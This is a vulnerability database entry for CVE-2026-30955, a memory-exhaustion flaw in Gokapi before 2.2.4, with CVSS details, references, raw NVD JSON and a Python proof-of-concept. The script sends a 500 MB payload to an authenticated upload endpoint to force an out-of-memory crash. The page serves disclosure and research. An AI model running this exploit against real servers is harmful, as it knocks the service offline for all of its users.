CVE-2026-30955

Description

Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An API endpoint accepts unbounded request bodies without any size limit. An authenticated user can cause an OOM kill and complete service disruption for all users. This vulnerability is fixed in 2.2.4.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:* - VULNERABLE

Gokapi < 2.2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-30955 PoC - Gokapi Unbounded Request Body DoS
Note: This is for educational and authorized testing purposes only.
"""
import requests
import sys
import argparse

def create_large_payload(size_mb):
    """Generate a large payload of specified size in MB"""
    return b'\x00' * (size_mb * 1024 * 1024)

def exploit_gokapi_dos(target_url, api_path, auth_token):
    """
    Exploit CVE-2026-30955 by sending unbounded request body
    to trigger OOM and service disruption
    """
    headers = {
        'Authorization': f'Bearer {auth_token}',
        'Content-Type': 'application/octet-stream'
    }
    
    # Try to send a very large payload (adjust size based on target memory)
    payload_size = 500  # MB - adjust based on target server memory
    print(f'[*] Generating {payload_size}MB payload...')
    
    payload = create_large_payload(payload_size)
    
    full_url = f'{target_url.rstrip("/")}/{api_path.lstrip("/")}'
    
    print(f'[*] Sending malicious request to {full_url}')
    print(f'[*] Payload size: {len(payload)} bytes')
    
    try:
        response = requests.post(
            full_url,
            headers=headers,
            data=payload,
            timeout=300
        )
        print(f'[!] Response status: {response.status_code}')
        return True
    except requests.exceptions.RequestException as e:
        print(f'[*] Request completed (connection may have been dropped): {e}')
        return True

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2026-30955 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target Gokapi server URL')
    parser.add_argument('-p', '--path', default='api/v1/upload', help='API endpoint path')
    parser.add_argument('-k', '--token', required=True, help='Authentication token')
    args = parser.parse_args()
    
    print('[+] CVE-2026-30955 - Gokapi Unbounded Request Body DoS')
    exploit_gokapi_dos(args.target, args.path, args.token)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30955
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30955
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30955/
[4] VulDB https://vuldb.com/cve/CVE-2026-30955
[5] https://github.com/Forceu/Gokapi/releases/tag/v2.2.4
[6] https://github.com/Forceu/Gokapi/security/advisories/GHSA-qwc6-vc2v-2ggj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30955", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:35.740", "lastModified": "2026-03-17T13:46:57.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gokapi is a self-hosted file sharing server with automatic expiration and encryption support. Prior to 2.2.4, An API endpoint accepts unbounded request bodies without any size limit. An authenticated user can cause an OOM kill and complete service disruption for all users. This vulnerability is fixed in 2.2.4."}, {"lang": "es", "value": "Gokapi es un servidor para compartir archivos autoalojado con expiración automática y soporte de cifrado. Antes de la versión 2.2.4, un endpoint de API acepta cuerpos de solicitud ilimitados sin ningún límite de tamaño. Un usuario autenticado puede causar un OOM kill y una interrupción completa del servicio para todos los usuarios. Esta vulnerabilidad está corregida en la versión 2.2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:forceu:gokapi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.4", "matchCriteriaId": "CE6F3F4D-D449-43DD-BB3D-86F98581926C"}]}]}], "references": [{"url": "https://github.com/Forceu/Gokapi/releases/tag/v2.2.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/Forceu/Gokapi/security/advisories/GHSA-qwc6-vc2v-2ggj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}